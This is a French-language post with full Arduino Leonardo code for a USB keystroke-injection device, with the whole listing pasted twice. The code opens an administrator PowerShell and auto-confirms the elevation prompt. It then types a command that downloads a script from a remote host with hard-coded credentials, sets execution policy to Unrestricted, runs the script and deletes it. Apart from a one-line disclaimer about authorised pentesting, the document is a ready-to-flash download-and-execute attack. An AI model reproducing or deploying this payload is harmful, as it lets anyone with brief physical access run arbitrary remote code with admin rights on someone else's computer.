Le code ci-dessous est utilisable sur un Arduino Leonardo ou n’importe quel autre device ayant comme chip « MEGA32U4 ». Le script va télécharger sur une URL distante un script powershell, puis va le copier sur le bureau et enfin l’exécuter avant de quitter le Shell.
Utilisé à des fins de pentest un USB Rubber Ducky doit être utilisé sur des matériels dont vous êtes propriétaire ou avec autorisation.
#include "KeyboardAzertyFr.h"
void start() {
KeyboardAzertyFr.begin();
rdLongerDelay();
}
void finish() {
KeyboardAzertyFr.end();
}
void rdDelay() {
delay(100);
}
void rdLongerDelay() {
for(int i = 0; i < 5; i++) rdDelay();
}
void rdWriteText(String text) {
KeyboardAzertyFr.print(text);
rdDelay();
}
void rdTypeKey(uint8_t key)
{
KeyboardAzertyFr.press(key);
rdDelay();
KeyboardAzertyFr.release(key);
rdDelay();
}
/***********************
* Libraries *
***********************
* You may remove the *
* unused functions *
* before uploading *
* the code to the *
* arduino *
***********************/
/**
* Runs a program.
* Example: "notepad" starts notepad, "calc" starts the calculator.
*/
void rdRun(String program) {
rdGuiCombination('r');
KeyboardAzertyFr.print(program);
rdDelay();
rdTypeKey(KEY_RETURN);
}
/**
* Takes a screenshot.
*/
void rdPrintScreen() {
// some machines use 206 key as the PrtScreen key
// others might use 229, and others might use both so
// we use both instructions
rdTypeKey(206);
rdTypeKey(229);
KeyboardAzertyFr.print(F("h"));
rdDelay();
KeyboardAzertyFr.print(F("b"));
rdDelay();
}
/**
* Opens the JavaScript console on a browser.
*/
void rdOpenJavascriptConsole() {
rdKeyCombination(KEY_LEFT_CTRL, KEY_LEFT_SHIFT, 'i');
}
/**
* Hides a window:
* Basically it drags a window to the lowest it can be
* and then repositions the cursor.
*/
void rdHideWindow() {
rdAltCombination(' ');
KeyboardAzertyFr.print(F("M"));
rdDelay();
KeyboardAzertyFr.press(KEY_DOWN_ARROW);
// 100 should be enough to guarantee the window is as low as possible
// also please notice that 100 is not the real number of strokes since
// some of the strokes are ignored.
for(int i = 0; i < 10; i++) rdLongerDelay();;
KeyboardAzertyFr.release(KEY_DOWN_ARROW);
// return repositions the cursor back to its original position
rdTypeKey(KEY_RETURN);
}
/**
* Same as Win + D
*/
void rdShowDesktop() {
rdGuiCombination('d');
}
/**
* Same as Ctrl + V
*/
void rdPaste() {
rdCtrlCombination('v');
}
/**
* Same as Ctrl + X
*/
void rdCut() {
rdCtrlCombination('x');
}
/**
* Same as Ctrl + C
*/
void rdCopy() {
rdCtrlCombination('c');
}
/**
* Same as Gui + (the received key)
*/
void rdGuiCombination(uint8_t c) {
rdKeyCombination(KEY_LEFT_GUI, c);
}
/**
* Same as Alt + (the received key)
*/
void rdAltCombination(uint8_t c) {
rdKeyCombination(KEY_LEFT_ALT, c);
}
/**
* Same as Ctrl + (the received key)
*/
void rdCtrlCombination(uint8_t c) {
rdKeyCombination(KEY_LEFT_CTRL, c);
}
/**
* Same as Shift + (the received key).
*/
void rdShiftCombination(uint8_t c) {
rdKeyCombination(KEY_LEFT_SHIFT, c);
}
/**
* Same as (Received hold key) + (target key).
*/
void rdKeyCombination(uint8_t holdKey, uint8_t targetKey) {
KeyboardAzertyFr.press(holdKey);
rdDelay();
KeyboardAzertyFr.press(targetKey);
rdDelay();
KeyboardAzertyFr.releaseAll();
rdDelay();
}
/**
* Same as (Received hold key 1) + (received hold key 2) + (target key).
*/
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t targetKey) {
KeyboardAzertyFr.press(holdKey1);
rdDelay();
rdKeyCombination(holdKey2, targetKey);
}
/**
* Same as above but with one more hold key.
*/
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t holdKey3, uint8_t targetKey) {
KeyboardAzertyFr.press(holdKey1);
rdDelay();
rdKeyCombination(holdKey2, holdKey3, targetKey);
}
/**
* Opens the command prompt without admin rights.
*/
void rdOpenCommandPrompt() {
rdOpenCommandPrompt(false);
}
/**
* Opens the command prompt, if the "admin" parameter
* has a "true value", it opens a command prompt
* with admin rights. Or without admin rights otherwise.
*/
void rdOpenCommandPrompt(boolean admin) {
if (admin) {
rdGuiCombination('x');
KeyboardAzertyFr.print(F("a"));
delay(100);
rdAcceptWindowsSmartScreen();
} else {
rdRun("cmd");
}
}
/**
* Accepts the windows smart screen to grant admin permissions.
*/
void rdAcceptWindowsSmartScreen() {
// Wait untill smart screen shows up
rdLongerDelay();
rdTypeKey(KEY_LEFT_ARROW);
rdDelay();
KeyboardAzertyFr.print(F(" "));
rdDelay();
}
/**
* Changes the keyboard layout, if the computer only
* has 1 keyboard layout this key combination won't
* do anything.
*/
void rdChangeKeyboardLayout() {
rdAltCombination(KEY_LEFT_SHIFT);
}
/**
* It runs one or multiple powershell scripts,
* to run multiple scripts, separate them with a new line "\n" char.
*/
void rdPowershellRun(String scripts) {
char delimiter = '\n';
String finalScript = "powershell ";
while (scripts.indexOf('\n') > 0) {
finalScript = finalScript + "(" + scripts.substring(0, scripts.indexOf('\n')) + ") ; ";
scripts = scripts.substring(scripts.indexOf('\n') + 1);
}
//finalScript = finalScript + "(" + scripts + ")";
finalScript = finalScript + scripts;
rdRun(finalScript);
}
void typeKey(int key)
{
KeyboardAzertyFr.press(key);
delay(500);
KeyboardAzertyFr.release(key);
}
/*********************
* Arduino *
*********************/
// ---------------------------------------------------
// ' ' est le symbole qui désigne un espace, il a la valeur 44
// Alt Gr azerty € ~ # { [ | ` \ ^ @ ' ' ] } ¤
// Shift azerty Q B C D E F G H I J K L ? N O P A R S T U V Z X Y Z 1 2 3 4 5 6 7 8 9 0 ' ' ° + ¨ £ µ No fr M % NONE . / § >
// azerty q b c d e f g h i j k l , n o p a r s t u v z x y z & é " ' ( - è _ ç à ' ' ) = ^ $ * No fr m ù ² ; : ! <
// qwerty a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0 ' ' - = [ ] \ No US ; ' ` , . / No US
// scancode 4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 44, 45,46,47,48,49, 50, 51,52, 53, 54,55,56, 100};
void setup() {
start();
//Ouverture Powershell en administrateur
rdOpenCommandPrompt(true);
delay(500);
//debut de telechargement dun script distant
KeyboardAzertyFr.print("$output = $env:USERPROFILE");
//affiche un + pour concat powershell
KeyboardAzertyFr.press(KEY_LEFT_SHIFT);
KeyboardAzertyFr.print("=");//affiche un + pour concat
KeyboardAzertyFr.release(KEY_LEFT_SHIFT);
KeyboardAzertyFr.print("'");
// Pour composer le caractère \ dans le path powershell
// Alt Gr = Ctrl + Alt
KeyboardAzertyFr.press(KEY_LEFT_CTRL);
KeyboardAzertyFr.press(KEY_LEFT_ALT);
keyboardScanCode(37); // ou keyboard.print('\');
KeyboardAzertyFr.release(KEY_LEFT_ALT);
KeyboardAzertyFr.release(KEY_LEFT_CTRL);
KeyboardAzertyFr.print("Desktop");
KeyboardAzertyFr.press(KEY_LEFT_CTRL);
KeyboardAzertyFr.press(KEY_LEFT_ALT);
keyboardScanCode(37); // ou keyboard.print('\');
KeyboardAzertyFr.release(KEY_LEFT_ALT);
KeyboardAzertyFr.release(KEY_LEFT_CTRL);
KeyboardAzertyFr.print("GetRessources.ps1';");
KeyboardAzertyFr.print("$securepassword = ConvertTo-SecureString 'user00290987' -AsPlainText -Force;$credentials = New-Object System.Management.Automation.PSCredential('user002', $securepassword);Invoke-WebRequest -Uri http://monip/ressources/GetRessources.ps1 -OutFile $output -Credential $credentials;Set-ExecutionPolicy Unrestricted -force; & $output;Remove-Item -path $output;exit;");
delay(500);
rdTypeKey(KEY_RETURN);
finish();
}
void loop() {}
void keyboardScanCode(byte code){
KeyboardAzertyFr.press(code+136);
delay(5);
KeyboardAzertyFr.release(code+136);
}
void start() {
KeyboardAzertyFr.begin();
rdLongerDelay();
}
void finish() {
KeyboardAzertyFr.end();
}
void rdDelay() {
delay(100);
}
void rdLongerDelay() {
for(int i = 0; i < 5; i++) rdDelay();
}
void rdWriteText(String text) {
KeyboardAzertyFr.print(text);
rdDelay();
}
void rdTypeKey(uint8_t key)
{
KeyboardAzertyFr.press(key);
rdDelay();
KeyboardAzertyFr.release(key);
rdDelay();
}
/***********************
* Libraries *
***********************
* You may remove the *
* unused functions *
* before uploading *
* the code to the *
* arduino *
***********************/
/**
* Runs a program.
* Example: "notepad" starts notepad, "calc" starts the calculator.
*/
void rdRun(String program) {
rdGuiCombination('r');
KeyboardAzertyFr.print(program);
rdDelay();
rdTypeKey(KEY_RETURN);
}
/**
* Takes a screenshot.
*/
void rdPrintScreen() {
// some machines use 206 key as the PrtScreen key
// others might use 229, and others might use both so
// we use both instructions
rdTypeKey(206);
rdTypeKey(229);
KeyboardAzertyFr.print(F("h"));
rdDelay();
KeyboardAzertyFr.print(F("b"));
rdDelay();
}
/**
* Opens the JavaScript console on a browser.
*/
void rdOpenJavascriptConsole() {
rdKeyCombination(KEY_LEFT_CTRL, KEY_LEFT_SHIFT, 'i');
}
/**
* Hides a window:
* Basically it drags a window to the lowest it can be
* and then repositions the cursor.
*/
void rdHideWindow() {
rdAltCombination(' ');
KeyboardAzertyFr.print(F("M"));
rdDelay();
KeyboardAzertyFr.press(KEY_DOWN_ARROW);
// 100 should be enough to guarantee the window is as low as possible
// also please notice that 100 is not the real number of strokes since
// some of the strokes are ignored.
for(int i = 0; i < 10; i++) rdLongerDelay();;
KeyboardAzertyFr.release(KEY_DOWN_ARROW);
// return repositions the cursor back to its original position
rdTypeKey(KEY_RETURN);
}
/**
* Same as Win + D
*/
void rdShowDesktop() {
rdGuiCombination('d');
}
/**
* Same as Ctrl + V
*/
void rdPaste() {
rdCtrlCombination('v');
}
/**
* Same as Ctrl + X
*/
void rdCut() {
rdCtrlCombination('x');
}
/**
* Same as Ctrl + C
*/
void rdCopy() {
rdCtrlCombination('c');
}
/**
* Same as Gui + (the received key)
*/
void rdGuiCombination(uint8_t c) {
rdKeyCombination(KEY_LEFT_GUI, c);
}
/**
* Same as Alt + (the received key)
*/
void rdAltCombination(uint8_t c) {
rdKeyCombination(KEY_LEFT_ALT, c);
}
/**
* Same as Ctrl + (the received key)
*/
void rdCtrlCombination(uint8_t c) {
rdKeyCombination(KEY_LEFT_CTRL, c);
}
/**
* Same as Shift + (the received key).
*/
void rdShiftCombination(uint8_t c) {
rdKeyCombination(KEY_LEFT_SHIFT, c);
}
/**
* Same as (Received hold key) + (target key).
*/
void rdKeyCombination(uint8_t holdKey, uint8_t targetKey) {
KeyboardAzertyFr.press(holdKey);
rdDelay();
KeyboardAzertyFr.press(targetKey);
rdDelay();
KeyboardAzertyFr.releaseAll();
rdDelay();
}
/**
* Same as (Received hold key 1) + (received hold key 2) + (target key).
*/
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t targetKey) {
KeyboardAzertyFr.press(holdKey1);
rdDelay();
rdKeyCombination(holdKey2, targetKey);
}
/**
* Same as above but with one more hold key.
*/
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t holdKey3, uint8_t targetKey) {
KeyboardAzertyFr.press(holdKey1);
rdDelay();
rdKeyCombination(holdKey2, holdKey3, targetKey);
}
/**
* Opens the command prompt without admin rights.
*/
void rdOpenCommandPrompt() {
rdOpenCommandPrompt(false);
}
/**
* Opens the command prompt, if the "admin" parameter
* has a "true value", it opens a command prompt
* with admin rights. Or without admin rights otherwise.
*/
void rdOpenCommandPrompt(boolean admin) {
if (admin) {
rdGuiCombination('x');
KeyboardAzertyFr.print(F("a"));
delay(100);
rdAcceptWindowsSmartScreen();
} else {
rdRun("cmd");
}
}
/**
* Accepts the windows smart screen to grant admin permissions.
*/
void rdAcceptWindowsSmartScreen() {
// Wait untill smart screen shows up
rdLongerDelay();
rdTypeKey(KEY_LEFT_ARROW);
rdDelay();
KeyboardAzertyFr.print(F(" "));
rdDelay();
}
/**
* Changes the keyboard layout, if the computer only
* has 1 keyboard layout this key combination won't
* do anything.
*/
void rdChangeKeyboardLayout() {
rdAltCombination(KEY_LEFT_SHIFT);
}
/**
* It runs one or multiple powershell scripts,
* to run multiple scripts, separate them with a new line "\n" char.
*/
void rdPowershellRun(String scripts) {
char delimiter = '\n';
String finalScript = "powershell ";
while (scripts.indexOf('\n') > 0) {
finalScript = finalScript + "(" + scripts.substring(0, scripts.indexOf('\n')) + ") ; ";
scripts = scripts.substring(scripts.indexOf('\n') + 1);
}
//finalScript = finalScript + "(" + scripts + ")";
finalScript = finalScript + scripts;
rdRun(finalScript);
}
void typeKey(int key)
{
KeyboardAzertyFr.press(key);
delay(500);
KeyboardAzertyFr.release(key);
}
/*********************
* Arduino *
*********************/
// ---------------------------------------------------
// ' ' est le symbole qui désigne un espace, il a la valeur 44
// Alt Gr azerty € ~ # { [ | ` \ ^ @ ' ' ] } ¤
// Shift azerty Q B C D E F G H I J K L ? N O P A R S T U V Z X Y Z 1 2 3 4 5 6 7 8 9 0 ' ' ° + ¨ £ µ No fr M % NONE . / § >
// azerty q b c d e f g h i j k l , n o p a r s t u v z x y z & é " ' ( - è _ ç à ' ' ) = ^ $ * No fr m ù ² ; : ! <
// qwerty a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0 ' ' - = [ ] \ No US ; ' ` , . / No US
// scancode 4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 44, 45,46,47,48,49, 50, 51,52, 53, 54,55,56, 100};
void setup() {
start();
//Ouverture Powershell en administrateur
rdOpenCommandPrompt(true);
delay(500);
//debut de telechargement dun script distant
KeyboardAzertyFr.print("$output = $env:USERPROFILE");
//affiche un + pour concat powershell
KeyboardAzertyFr.press(KEY_LEFT_SHIFT);
KeyboardAzertyFr.print("=");//affiche un + pour concat
KeyboardAzertyFr.release(KEY_LEFT_SHIFT);
KeyboardAzertyFr.print("'");
// Pour composer le caractère \ dans le path powershell
// Alt Gr = Ctrl + Alt
KeyboardAzertyFr.press(KEY_LEFT_CTRL);
KeyboardAzertyFr.press(KEY_LEFT_ALT);
keyboardScanCode(37); // ou keyboard.print('\');
KeyboardAzertyFr.release(KEY_LEFT_ALT);
KeyboardAzertyFr.release(KEY_LEFT_CTRL);
KeyboardAzertyFr.print("Desktop");
KeyboardAzertyFr.press(KEY_LEFT_CTRL);
KeyboardAzertyFr.press(KEY_LEFT_ALT);
keyboardScanCode(37); // ou keyboard.print('\');
KeyboardAzertyFr.release(KEY_LEFT_ALT);
KeyboardAzertyFr.release(KEY_LEFT_CTRL);
KeyboardAzertyFr.print("GetRessources.ps1';");
KeyboardAzertyFr.print("$securepassword = ConvertTo-SecureString 'user00290987' -AsPlainText -Force;$credentials = New-Object System.Management.Automation.PSCredential('user002', $securepassword);Invoke-WebRequest -Uri http://monip/ressources/GetRessources.ps1 -OutFile $output -Credential $credentials;Set-ExecutionPolicy Unrestricted -force; & $output;Remove-Item -path $output;exit;");
delay(500);
rdTypeKey(KEY_RETURN);
finish();
}
void loop() {}
void keyboardScanCode(byte code){
KeyboardAzertyFr.press(code+136);
delay(5);
KeyboardAzertyFr.release(code+136);
}